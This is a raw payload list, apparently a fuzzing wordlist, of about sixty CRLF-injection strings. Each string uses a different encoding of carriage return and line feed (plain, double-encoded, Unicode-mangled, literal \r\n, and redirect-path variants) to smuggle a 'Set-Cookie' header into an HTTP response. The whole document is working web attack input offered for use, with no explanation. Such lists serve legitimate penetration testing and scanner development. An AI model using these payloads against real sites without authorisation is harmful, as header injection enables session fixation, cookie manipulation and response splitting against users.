%0ASet-Cookie:test
%0A%20Set-Cookie:test
%20%0ASet-Cookie:test
%23%0ASet-Cookie:test
%E5%98%8A%E5%98%8DSet-Cookie:test
%E5%98%8A%E5%98%8D%0ASet-Cookie:test
%3F%0ASet-Cookie:test
crlf%0ASet-Cookie:test
crlf%0A%20Set-Cookie:test
crlf%20%0ASet-Cookie:test
crlf%23%0ASet-Cookie:test
crlf%E5%98%8A%E5%98%8DSet-Cookie:test
crlf%E5%98%8A%E5%98%8D%0ASet-Cookie:test
crlf%3F%0ASet-Cookie:test
%0DSet-Cookie:test
%0D%20Set-Cookie:test
%20%0DSet-Cookie:test
%23%0DSet-Cookie:test
%23%0ASet-Cookie:test
%E5%98%8A%E5%98%8DSet-Cookie:test
%E5%98%8A%E5%98%8D%0DSet-Cookie:test
%3F%0DSet-Cookie:test
crlf%0DSet-Cookie:test
crlf%0D%20Set-Cookie:test
crlf%20%0DSet-Cookie:test
crlf%23%0DSet-Cookie:test
crlf%23%0ASet-Cookie:test
crlf%E5%98%8A%E5%98%8DSet-Cookie:test
crlf%E5%98%8A%E5%98%8D%0DSet-Cookie:test
crlf%3F%0DSet-Cookie:test
%0D%0ASet-Cookie:test
%0D%0A%20Set-Cookie:test
%20%0D%0ASet-Cookie:test
%23%0D%0ASet-Cookie:test
\r\nSet-Cookie:test
 \r\n Set-Cookie:test
\r\n Set-Cookie:test
%5cr%5cnSet-Cookie:test
%E5%98%8A%E5%98%8DSet-Cookie:test
%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:test
%3F%0D%0ASet-Cookie:test
crlf%0D%0ASet-Cookie:test
crlf%0D%0A%20Set-Cookie:test
crlf%20%0D%0ASet-Cookie:test
crlf%23%0D%0ASet-Cookie:test
crlf\r\nSet-Cookie:test
crlf%5cr%5cnSet-Cookie:test
crlf%E5%98%8A%E5%98%8DSet-Cookie:test
crlf%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:test
crlf%3F%0D%0ASet-Cookie:test
%0D%0A%09Set-Cookie:test
crlf%0D%0A%09Set-Cookie:test
%250ASet-Cookie:test
%25250ASet-Cookie:test
%0A0ASet-Cookie:test
%25%30ASet-Cookie:test
%25%30%61Set-Cookie:test
//www.google.com/%2F%2E%2E%0D%0ASet-Cookie:test
/www.google.com/%2E%2E%2F%0D%0ASet-Cookie:test
/google.com/%2F..%0D%0ASet-Cookie:test